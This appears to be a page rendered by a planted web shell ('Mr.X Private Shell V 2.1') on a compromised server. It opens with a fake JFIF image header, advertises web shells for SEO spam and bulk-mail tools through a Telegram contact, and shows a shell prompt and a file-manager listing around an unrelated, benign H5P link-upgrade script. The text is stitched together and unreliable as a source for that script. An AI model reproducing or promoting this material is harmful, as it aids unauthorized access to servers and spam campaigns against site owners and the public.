����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.249: ~ $
/*global H5P*/
/** @namespace H5PUpgrades */
var H5PUpgrades = H5PUpgrades || {};

H5PUpgrades['H5P.Link'] = (function () {
  return {
    1: {
      /**
       * Asynchronous content upgrade hook.
       * Upgrades content parameters to support link v1.1.
       *
       * Sets protocol to none.
       *
       * @params {Object} parameters
       * @params {function} finished
       */
      1: function (parameters, finished) {
        var allowedProtocols = ['http://', 'https://', '/'];
        var urlProtocol;
        var url = parameters.url || '';

        // Check if url had any allowed protocols
        allowedProtocols.forEach(function (protocol) {
          if (url.substr(0, protocol.length) === protocol) {
            urlProtocol = protocol;
            url = url.substr(protocol.length);
          }
        });

        // Set new link widget parameters
        parameters.linkWidget = {
          url: url
        };

        if (urlProtocol) {
          parameters.linkWidget.protocol = urlProtocol;
        } else {
          parameters.linkWidget.protocol = 'other';
        }

        //Remove old url
        delete parameters.url;

        // Done
        finished(null, parameters);
      }
    }
  };
})();

Filemanager

Name Type Size Permission Actions
4f62f0781959e20c40286100365ea4650ba8ccaf File 1.21 KB 0666